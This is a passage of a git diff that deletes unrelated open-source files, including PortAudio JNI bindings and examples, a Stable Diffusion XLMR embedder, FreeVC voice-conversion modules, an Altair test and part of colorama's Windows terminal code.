JNICALL Java_com_portaudio_PortAudio_hostApiDeviceIndexToDeviceIndex - (JNIEnv *env, jclass clazz, jint hostApiIndex, jint apiDeviceIndex) -{ - return Pa_HostApiDeviceIndexToDeviceIndex( hostApiIndex, apiDeviceIndex ); -} - - -/* - * Class: com_portaudio_PortAudio - * Method: getHostApiInfo - * Signature: (ILcom/portaudio/HostApiInfo;)I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_getHostApiInfo - (JNIEnv *env, jclass clazz, jint index, jobject hostApiInfo) -{ - const PaHostApiInfo *info; - /* Get a reference to obj's class */ - jclass cls = (*env)->GetObjectClass(env, hostApiInfo); - - info = Pa_GetHostApiInfo( index ); - if( info == NULL ) - { - jpa_ThrowError( env, "Pa_GetHostApiInfo returned NULL." 
); - } - else - { - jpa_SetIntField( env, cls, hostApiInfo, "version", info->structVersion ); - jpa_SetIntField( env, cls, hostApiInfo, "type", info->type ); - jpa_SetStringField( env, cls, hostApiInfo, "name", info->name ); - jpa_SetIntField( env, cls, hostApiInfo, "deviceCount", info->deviceCount ); - jpa_SetIntField( env, cls, hostApiInfo, "defaultInputDevice", info->defaultInputDevice ); - jpa_SetIntField( env, cls, hostApiInfo, "defaultOutputDevice", info->defaultOutputDevice ); - } -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDefaultInputDevice - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getDefaultInputDevice - (JNIEnv *env, jclass clazz) -{ - jint deviceId = Pa_GetDefaultInputDevice(); - return jpa_CheckError( env, deviceId ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDefaultOutputDevice - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getDefaultOutputDevice - (JNIEnv *env, jclass clazz) -{ - jint deviceId = Pa_GetDefaultOutputDevice(); - return jpa_CheckError( env, deviceId ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: getDefaultHostApi - * Signature: ()I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_getDefaultHostApi - (JNIEnv *env, jclass clazz) -{ - jint deviceId = Pa_GetDefaultHostApi(); - return jpa_CheckError( env, deviceId ); -} - -/* - * Class: com_portaudio_PortAudio - * Method: isFormatSupported - * Signature: (Lcom/portaudio/StreamParameters;Lcom/portaudio/StreamParameters;I)I - */ -JNIEXPORT jint JNICALL Java_com_portaudio_PortAudio_isFormatSupported - (JNIEnv *env, jclass clazz, jobject inParams, jobject outParams, jint sampleRate ) -{ - PaStreamParameters myInParams, *paInParams; - PaStreamParameters myOutParams, *paOutParams; - - paInParams = jpa_FillStreamParameters( env, inParams, &myInParams ); - paOutParams = jpa_FillStreamParameters( env, outParams, &myOutParams ); - - return Pa_IsFormatSupported( paInParams, paOutParams, sampleRate ); - -} - -/* - * Class: com_portaudio_PortAudio - * Method: openStream - * Signature: (Lcom/portaudio/BlockingStream;Lcom/portaudio/StreamParameters;Lcom/portaudio/StreamParameters;III)I - */ -JNIEXPORT void JNICALL Java_com_portaudio_PortAudio_openStream - (JNIEnv *env, jclass clazz, jobject blockingStream, jobject inParams, jobject outParams, jint sampleRate, jint framesPerBuffer, jint flags ) -{ - int err; - PaStreamParameters myInParams, *paInParams; - PaStreamParameters myOutParams, *paOutParams; - PaStream *stream; - - paInParams = jpa_FillStreamParameters( env, inParams, &myInParams ); - paOutParams = jpa_FillStreamParameters( env, outParams, &myOutParams ); - err = Pa_OpenStream( &stream, paInParams, paOutParams, sampleRate, framesPerBuffer, flags, NULL, NULL ); - if( jpa_CheckError( env, err ) == 0 ) - { - jclass cls = (*env)->GetObjectClass(env, blockingStream); - jpa_SetLongField( env, cls, blockingStream, "nativeStream", (jlong) stream ); - if( paInParams != NULL ) - { - jpa_SetIntField( env, cls, blockingStream, "inputFormat", paInParams->sampleFormat ); - } - if( paOutParams != NULL ) - { - jpa_SetIntField( env, cls, blockingStream, "outputFormat", paOutParams->sampleFormat ); - } - } -} diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/examples/pa_devs.c b/spaces/amarchheda/ChordDuplicate/portaudio/examples/pa_devs.c deleted file mode 100644 index 27acfd53b24ade7ec95545617f9975db0758a911..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/examples/pa_devs.c 
+++ /dev/null @@ -1,252 +0,0 @@ -/** @file pa_devs.c - @ingroup examples_src - @brief List available devices, including device information. - @author Phil Burk http://www.softsynth.com - - @note Define PA_USE_ASIO=0 to compile this code on Windows without - ASIO support. -*/ -/* - * $Id$ - * - * This program uses the PortAudio Portable Audio Library. - * For more information see: http://www.portaudio.com - * Copyright (c) 1999-2000 Ross Bencina and Phil Burk - * - * Permission is hereby granted, free of charge, to any person obtaining - * a copy of this software and associated documentation files - * (the "Software"), to deal in the Software without restriction, - * including without limitation the rights to use, copy, modify, merge, - * publish, distribute, sublicense, and/or sell copies of the Software, - * and to permit persons to whom the Software is furnished to do so, - * subject to the following conditions: - * - * The above copyright notice and this permission notice shall be - * included in all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, - * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF - * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. - * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR - * ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF - * CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION - * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - */ - -/* - * The text above constitutes the entire PortAudio license; however, - * the PortAudio community also makes the following non-binding requests: - * - * Any person wishing to distribute modifications to the Software is - * requested to send the modifications to the original developer so that - * they can be incorporated into the canonical version. It is also - * requested that these non-binding requests be included along with the - * license above. 
- */ - -#include -#include -#include "portaudio.h" - -#ifdef WIN32 -#include - -#if PA_USE_ASIO -#include "pa_asio.h" -#endif -#endif - -/*******************************************************************/ -static void PrintSupportedStandardSampleRates( - const PaStreamParameters *inputParameters, - const PaStreamParameters *outputParameters ) -{ - static double standardSampleRates[] = { - 8000.0, 9600.0, 11025.0, 12000.0, 16000.0, 22050.0, 24000.0, 32000.0, - 44100.0, 48000.0, 88200.0, 96000.0, 192000.0, -1 /* negative terminated list */ - }; - int i, printCount; - PaError err; - - printCount = 0; - for( i=0; standardSampleRates[i] > 0; i++ ) - { - err = Pa_IsFormatSupported( inputParameters, outputParameters, standardSampleRates[i] ); - if( err == paFormatIsSupported ) - { - if( printCount == 0 ) - { - printf( "\t%8.2f", standardSampleRates[i] ); - printCount = 1; - } - else if( printCount == 4 ) - { - printf( ",\n\t%8.2f", standardSampleRates[i] ); - printCount = 1; - } - else - { - printf( ", %8.2f", standardSampleRates[i] ); - ++printCount; - } - } - } - if( !printCount ) - printf( "None\n" ); - else - printf( "\n" ); -} - -/*******************************************************************/ -int main(void); -int main(void) -{ - int i, numDevices, defaultDisplayed; - const PaDeviceInfo *deviceInfo; - PaStreamParameters inputParameters, outputParameters; - PaError err; - - - err = Pa_Initialize(); - if( err != paNoError ) - { - printf( "ERROR: Pa_Initialize returned 0x%x\n", err ); - goto error; - } - - printf( "PortAudio version: 0x%08X\n", Pa_GetVersion()); - printf( "Version text: '%s'\n", Pa_GetVersionInfo()->versionText ); - - numDevices = Pa_GetDeviceCount(); - if( numDevices < 0 ) - { - printf( "ERROR: Pa_GetDeviceCount returned 0x%x\n", numDevices ); - err = numDevices; - goto error; - } - - printf( "Number of devices = %d\n", numDevices ); - for( i=0; ihostApi )->defaultInputDevice ) - { - const PaHostApiInfo *hostInfo = Pa_GetHostApiInfo( deviceInfo->hostApi ); - printf( "[ Default %s Input", hostInfo->name ); - defaultDisplayed = 1; - } - - if( i == Pa_GetDefaultOutputDevice() ) - { - printf( (defaultDisplayed ? "," : "[") ); - printf( " Default Output" ); - defaultDisplayed = 1; - } - else if( i == Pa_GetHostApiInfo( deviceInfo->hostApi )->defaultOutputDevice ) - { - const PaHostApiInfo *hostInfo = Pa_GetHostApiInfo( deviceInfo->hostApi ); - printf( (defaultDisplayed ? 
"," : "[") ); - printf( " Default %s Output", hostInfo->name ); - defaultDisplayed = 1; - } - - if( defaultDisplayed ) - printf( " ]\n" ); - - /* print device info fields */ -#ifdef WIN32 - { /* Use wide char on windows, so we can show UTF-8 encoded device names */ - wchar_t wideName[MAX_PATH]; - MultiByteToWideChar(CP_UTF8, 0, deviceInfo->name, -1, wideName, MAX_PATH-1); - wprintf( L"Name = %s\n", wideName ); - } -#else - printf( "Name = %s\n", deviceInfo->name ); -#endif - printf( "Host API = %s\n", Pa_GetHostApiInfo( deviceInfo->hostApi )->name ); - printf( "Max inputs = %d", deviceInfo->maxInputChannels ); - printf( ", Max outputs = %d\n", deviceInfo->maxOutputChannels ); - - printf( "Default low input latency = %8.4f\n", deviceInfo->defaultLowInputLatency ); - printf( "Default low output latency = %8.4f\n", deviceInfo->defaultLowOutputLatency ); - printf( "Default high input latency = %8.4f\n", deviceInfo->defaultHighInputLatency ); - printf( "Default high output latency = %8.4f\n", deviceInfo->defaultHighOutputLatency ); - -#ifdef WIN32 -#if PA_USE_ASIO -/* ASIO specific latency information */ - if( Pa_GetHostApiInfo( deviceInfo->hostApi )->type == paASIO ){ - long minLatency, maxLatency, preferredLatency, granularity; - - err = PaAsio_GetAvailableLatencyValues( i, - &minLatency, &maxLatency, &preferredLatency, &granularity ); - - printf( "ASIO minimum buffer size = %ld\n", minLatency ); - printf( "ASIO maximum buffer size = %ld\n", maxLatency ); - printf( "ASIO preferred buffer size = %ld\n", preferredLatency ); - - if( granularity == -1 ) - printf( "ASIO buffer granularity = power of 2\n" ); - else - printf( "ASIO buffer granularity = %ld\n", granularity ); - } -#endif /* PA_USE_ASIO */ -#endif /* WIN32 */ - - printf( "Default sample rate = %8.2f\n", deviceInfo->defaultSampleRate ); - - /* poll for standard sample rates */ - inputParameters.device = i; - inputParameters.channelCount = deviceInfo->maxInputChannels; - inputParameters.sampleFormat = paInt16; - inputParameters.suggestedLatency = 0; /* ignored by Pa_IsFormatSupported() */ - inputParameters.hostApiSpecificStreamInfo = NULL; - - outputParameters.device = i; - outputParameters.channelCount = deviceInfo->maxOutputChannels; - outputParameters.sampleFormat = paInt16; - outputParameters.suggestedLatency = 0; /* ignored by Pa_IsFormatSupported() */ - outputParameters.hostApiSpecificStreamInfo = NULL; - - if( inputParameters.channelCount > 0 ) - { - printf("Supported standard sample rates\n for half-duplex 16 bit %d channel input = \n", - inputParameters.channelCount ); - PrintSupportedStandardSampleRates( &inputParameters, NULL ); - } - - if( outputParameters.channelCount > 0 ) - { - printf("Supported standard sample rates\n for half-duplex 16 bit %d channel output = \n", - outputParameters.channelCount ); - PrintSupportedStandardSampleRates( NULL, &outputParameters ); - } - - if( inputParameters.channelCount > 0 && outputParameters.channelCount > 0 ) - { - printf("Supported standard sample rates\n for full-duplex 16 bit %d channel input, %d channel output = \n", - inputParameters.channelCount, outputParameters.channelCount ); - PrintSupportedStandardSampleRates( &inputParameters, &outputParameters ); - } - } - - Pa_Terminate(); - - printf("----------------------------------------------\n"); - return 0; - -error: - Pa_Terminate(); - fprintf( stderr, "Error number: %d\n", err ); - fprintf( stderr, "Error message: %s\n", Pa_GetErrorText( err ) ); - return err; -} diff --git 
a/spaces/amarchheda/ChordDuplicate/portaudio/src/common/pa_dither.h b/spaces/amarchheda/ChordDuplicate/portaudio/src/common/pa_dither.h deleted file mode 100644 index 4f81123016891886e6bcd53151835e29d2046200..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/src/common/pa_dither.h +++ /dev/null @@ -1,106 +0,0 @@ -#ifndef PA_DITHER_H -#define PA_DITHER_H -/* - * $Id$ - * Portable Audio I/O Library triangular dither generator - * - * Based on the Open Source API proposed by Ross Bencina - * Copyright (c) 1999-2002 Phil Burk, Ross Bencina - * - * Permission is hereby granted, free of charge, to any person obtaining - * a copy of this software and associated documentation files - * (the "Software"), to deal in the Software without restriction, - * including without limitation the rights to use, copy, modify, merge, - * publish, distribute, sublicense, and/or sell copies of the Software, - * and to permit persons to whom the Software is furnished to do so, - * subject to the following conditions: - * - * The above copyright notice and this permission notice shall be - * included in all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, - * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF - * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. - * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR - * ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF - * CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION - * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - */ - -/* - * The text above constitutes the entire PortAudio license; however, - * the PortAudio community also makes the following non-binding requests: - * - * Any person wishing to distribute modifications to the Software is - * requested to send the modifications to the original developer so that - * they can be incorporated into the canonical version. It is also - * requested that these non-binding requests be included along with the - * license above. - */ - -/** @file - @ingroup common_src - - @brief Functions for generating dither noise -*/ - -#include "pa_types.h" - - -#ifdef __cplusplus -extern "C" -{ -#endif /* __cplusplus */ - -/* Note that the linear congruential algorithm requires 32 bit integers - * because it uses arithmetic overflow. So use PaUint32 instead of - * unsigned long so it will work on 64 bit systems. - */ - -/** @brief State needed to generate a dither signal */ -typedef struct PaUtilTriangularDitherGenerator{ - PaUint32 previous; - PaUint32 randSeed1; - PaUint32 randSeed2; -} PaUtilTriangularDitherGenerator; - - -/** @brief Initialize dither state */ -void PaUtil_InitializeTriangularDitherState( PaUtilTriangularDitherGenerator *ditherState ); - - -/** - @brief Calculate 2 LSB dither signal with a triangular distribution. - Ranged for adding to a 1 bit right-shifted 32 bit integer - prior to >>15. eg: -
    -    signed long in = *
    -    signed long dither = PaUtil_Generate16BitTriangularDither( ditherState );
    -    signed short out = (signed short)(((in>>1) + dither) >> 15);
    -
    - @return - A signed 32-bit integer with a range of +32767 to -32768 -*/ -PaInt32 PaUtil_Generate16BitTriangularDither( PaUtilTriangularDitherGenerator *ditherState ); - - -/** - @brief Calculate 2 LSB dither signal with a triangular distribution. - Ranged for adding to a pre-scaled float. -
    -    float in = *
    -    float dither = PaUtil_GenerateFloatTriangularDither( ditherState );
    -    // use smaller scaler to prevent overflow when we add the dither
    -    signed short out = (signed short)(in*(32766.0f) + dither );
    -
    - @return - A float with a range of -2.0 to +1.99999. -*/ -float PaUtil_GenerateFloatTriangularDither( PaUtilTriangularDitherGenerator *ditherState ); - - - -#ifdef __cplusplus -} -#endif /* __cplusplus */ -#endif /* PA_DITHER_H */ diff --git a/spaces/aodianyun/stable-diffusion-webui/modules/sd_hijack_xlmr.py b/spaces/aodianyun/stable-diffusion-webui/modules/sd_hijack_xlmr.py deleted file mode 100644 index 9e7e1803cbca8be1d8fd9e9e32f413016d02960d..0000000000000000000000000000000000000000 --- a/spaces/aodianyun/stable-diffusion-webui/modules/sd_hijack_xlmr.py +++ /dev/null @@ -1,34 +0,0 @@ -import open_clip.tokenizer -import torch - -from modules import sd_hijack_clip, devices -from modules.shared import opts - - -class FrozenXLMREmbedderWithCustomWords(sd_hijack_clip.FrozenCLIPEmbedderWithCustomWords): - def __init__(self, wrapped, hijack): - super().__init__(wrapped, hijack) - - self.id_start = wrapped.config.bos_token_id - self.id_end = wrapped.config.eos_token_id - self.id_pad = wrapped.config.pad_token_id - - self.comma_token = self.tokenizer.get_vocab().get(',', None) # alt diffusion doesn't have bits for comma - - def encode_with_transformers(self, tokens): - # there's no CLIP Skip here because all hidden layers have size of 1024 and the last one uses a - # trained layer to transform those 1024 into 768 for unet; so you can't choose which transformer - # layer to work with - you have to use the last - - attention_mask = (tokens != self.id_pad).to(device=tokens.device, dtype=torch.int64) - features = self.wrapped(input_ids=tokens, attention_mask=attention_mask) - z = features['projection_state'] - - return z - - def encode_embedding_init_text(self, init_text, nvpt): - embedding_layer = self.wrapped.roberta.embeddings - ids = self.wrapped.tokenizer(init_text, max_length=nvpt, return_tensors="pt", add_special_tokens=False)["input_ids"] - embedded = embedding_layer.token_embedding.wrapped(ids.to(devices.device)).squeeze(0) - - return embedded diff --git a/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/modules/freevc/modules.py b/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/modules/freevc/modules.py deleted file mode 100644 index 0503a13c8a18bae791aabb41b0e716ab3505222b..0000000000000000000000000000000000000000 --- a/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/modules/freevc/modules.py +++ /dev/null @@ -1,391 +0,0 @@ -import copy -import math - -import numpy as np -import scipy -import torch -from torch import nn -from torch.nn import AvgPool1d, Conv1d, Conv2d, ConvTranspose1d -from torch.nn import functional as F -from torch.nn.utils import remove_weight_norm, weight_norm - -import TTS.vc.modules.freevc.commons as commons -from TTS.vc.modules.freevc.commons import get_padding, init_weights - -LRELU_SLOPE = 0.1 - - -class LayerNorm(nn.Module): - def __init__(self, channels, eps=1e-5): - super().__init__() - self.channels = channels - self.eps = eps - - self.gamma = nn.Parameter(torch.ones(channels)) - self.beta = nn.Parameter(torch.zeros(channels)) - - def forward(self, x): - x = x.transpose(1, -1) - x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps) - return x.transpose(1, -1) - - -class ConvReluNorm(nn.Module): - def __init__(self, in_channels, hidden_channels, out_channels, kernel_size, n_layers, p_dropout): - super().__init__() - self.in_channels = in_channels - self.hidden_channels = hidden_channels - self.out_channels = out_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - assert n_layers > 1, "Number 
of layers should be larger than 0." - - self.conv_layers = nn.ModuleList() - self.norm_layers = nn.ModuleList() - self.conv_layers.append(nn.Conv1d(in_channels, hidden_channels, kernel_size, padding=kernel_size // 2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.relu_drop = nn.Sequential(nn.ReLU(), nn.Dropout(p_dropout)) - for _ in range(n_layers - 1): - self.conv_layers.append(nn.Conv1d(hidden_channels, hidden_channels, kernel_size, padding=kernel_size // 2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask): - x_org = x - for i in range(self.n_layers): - x = self.conv_layers[i](x * x_mask) - x = self.norm_layers[i](x) - x = self.relu_drop(x) - x = x_org + self.proj(x) - return x * x_mask - - -class DDSConv(nn.Module): - """ - Dialted and Depth-Separable Convolution - """ - - def __init__(self, channels, kernel_size, n_layers, p_dropout=0.0): - super().__init__() - self.channels = channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - - self.drop = nn.Dropout(p_dropout) - self.convs_sep = nn.ModuleList() - self.convs_1x1 = nn.ModuleList() - self.norms_1 = nn.ModuleList() - self.norms_2 = nn.ModuleList() - for i in range(n_layers): - dilation = kernel_size**i - padding = (kernel_size * dilation - dilation) // 2 - self.convs_sep.append( - nn.Conv1d(channels, channels, kernel_size, groups=channels, dilation=dilation, padding=padding) - ) - self.convs_1x1.append(nn.Conv1d(channels, channels, 1)) - self.norms_1.append(LayerNorm(channels)) - self.norms_2.append(LayerNorm(channels)) - - def forward(self, x, x_mask, g=None): - if g is not None: - x = x + g - for i in range(self.n_layers): - y = self.convs_sep[i](x * x_mask) - y = self.norms_1[i](y) - y = F.gelu(y) - y = self.convs_1x1[i](y) - y = self.norms_2[i](y) - y = F.gelu(y) - y = self.drop(y) - x = x + y - return x * x_mask - - -class WN(torch.nn.Module): - def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0): - super(WN, self).__init__() - assert kernel_size % 2 == 1 - self.hidden_channels = hidden_channels - self.kernel_size = (kernel_size,) - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.p_dropout = p_dropout - - self.in_layers = torch.nn.ModuleList() - self.res_skip_layers = torch.nn.ModuleList() - self.drop = nn.Dropout(p_dropout) - - if gin_channels != 0: - cond_layer = torch.nn.Conv1d(gin_channels, 2 * hidden_channels * n_layers, 1) - self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight") - - for i in range(n_layers): - dilation = dilation_rate**i - padding = int((kernel_size * dilation - dilation) / 2) - in_layer = torch.nn.Conv1d( - hidden_channels, 2 * hidden_channels, kernel_size, dilation=dilation, padding=padding - ) - in_layer = torch.nn.utils.weight_norm(in_layer, name="weight") - self.in_layers.append(in_layer) - - # last one is not necessary - if i < n_layers - 1: - res_skip_channels = 2 * hidden_channels - else: - res_skip_channels = hidden_channels - - res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1) - res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight") - self.res_skip_layers.append(res_skip_layer) - - def forward(self, x, x_mask, g=None, **kwargs): - output = torch.zeros_like(x) - n_channels_tensor = 
torch.IntTensor([self.hidden_channels]) - - if g is not None: - g = self.cond_layer(g) - - for i in range(self.n_layers): - x_in = self.in_layers[i](x) - if g is not None: - cond_offset = i * 2 * self.hidden_channels - g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :] - else: - g_l = torch.zeros_like(x_in) - - acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor) - acts = self.drop(acts) - - res_skip_acts = self.res_skip_layers[i](acts) - if i < self.n_layers - 1: - res_acts = res_skip_acts[:, : self.hidden_channels, :] - x = (x + res_acts) * x_mask - output = output + res_skip_acts[:, self.hidden_channels :, :] - else: - output = output + res_skip_acts - return output * x_mask - - def remove_weight_norm(self): - if self.gin_channels != 0: - torch.nn.utils.remove_weight_norm(self.cond_layer) - for l in self.in_layers: - torch.nn.utils.remove_weight_norm(l) - for l in self.res_skip_layers: - torch.nn.utils.remove_weight_norm(l) - - -class ResBlock1(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.convs1 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]), - ) - ), - ] - ) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList( - [ - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - ] - ) - self.convs2.apply(init_weights) - - def forward(self, x, x_mask=None): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c2(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.convs = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - ] - ) - self.convs.apply(init_weights) - - def forward(self, x, x_mask=None): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Log(nn.Module): - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = torch.log(torch.clamp_min(x, 1e-5)) * x_mask - logdet = torch.sum(-y, [1, 2]) - 
return y, logdet - else: - x = torch.exp(x) * x_mask - return x - - -class Flip(nn.Module): - def forward(self, x, *args, reverse=False, **kwargs): - x = torch.flip(x, [1]) - if not reverse: - logdet = torch.zeros(x.size(0)).to(dtype=x.dtype, device=x.device) - return x, logdet - else: - return x - - -class ElementwiseAffine(nn.Module): - def __init__(self, channels): - super().__init__() - self.channels = channels - self.m = nn.Parameter(torch.zeros(channels, 1)) - self.logs = nn.Parameter(torch.zeros(channels, 1)) - - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = self.m + torch.exp(self.logs) * x - y = y * x_mask - logdet = torch.sum(self.logs * x_mask, [1, 2]) - return y, logdet - else: - x = (x - self.m) * torch.exp(-self.logs) * x_mask - return x - - -class ResidualCouplingLayer(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=0, - gin_channels=0, - mean_only=False, - ): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = WN( - hidden_channels, kernel_size, dilation_rate, n_layers, p_dropout=p_dropout, gin_channels=gin_channels - ) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels] * 2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels] * 2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1, 2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/vega/tests/test_import.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/vega/tests/test_import.py deleted file mode 100644 index c569b86b758989b550fa3993653fe653b9709630..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/vega/tests/test_import.py +++ /dev/null @@ -1,5 +0,0 @@ -from altair.vega import SCHEMA_VERSION, SCHEMA_URL - - -def test_schema_version(): - assert SCHEMA_VERSION in SCHEMA_URL diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/colorama/winterm.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/colorama/winterm.py deleted file mode 100644 index aad867e8c80b826bf6a060116f17fa08a8eb0765..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/colorama/winterm.py +++ /dev/null @@ -1,195 +0,0 @@ -# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. -try: - from msvcrt import get_osfhandle -except ImportError: - def get_osfhandle(_): - raise OSError("This isn't windows!") - - -from . 
import win32 - -# from wincon.h -class WinColor(object): - BLACK = 0 - BLUE = 1 - GREEN = 2 - CYAN = 3 - RED = 4 - MAGENTA = 5 - YELLOW = 6 - GREY = 7 - -# from wincon.h -class WinStyle(object): - NORMAL = 0x00 # dim text, dim background - BRIGHT = 0x08 # bright text, dim background - BRIGHT_BACKGROUND = 0x80 # dim text, bright background - -class WinTerm(object): - - def __init__(self): - self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes - self.set_attrs(self._default) - self._default_fore = self._fore - self._default_back = self._back - self._default_style = self._style - # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style. - # So that LIGHT_EX colors and BRIGHT style do not clobber each other, - # we track them separately, since LIGHT_EX is overwritten by Fore/Back - # and BRIGHT is overwritten by Style codes. - self._light = 0 - - def get_attrs(self): - return self._fore + self._back * 16 + (self._style | self._light) - - def set_attrs(self, value): - self._fore = value & 7 - self._back = (value >> 4) & 7 - self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND) - - def reset_all(self, on_stderr=None): - self.set_attrs(self._default) - self.set_console(attrs=self._default) - self._light = 0 - - def fore(self, fore=None, light=False, on_stderr=False): - if fore is None: - fore = self._default_fore - self._fore = fore - # Emulate LIGHT_EX with BRIGHT Style - if light: - self._light |= WinStyle.BRIGHT - else: - self._light &= ~WinStyle.BRIGHT - self.set_console(on_stderr=on_stderr) - - def back(self, back=None, light=False, on_stderr=False): - if back is None: - back = self._default_back - self._back = back - # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style - if light: - self._light |= WinStyle.BRIGHT_BACKGROUND - else: - self._light &= ~WinStyle.BRIGHT_BACKGROUND - self.set_console(on_stderr=on_stderr) - - def style(self, 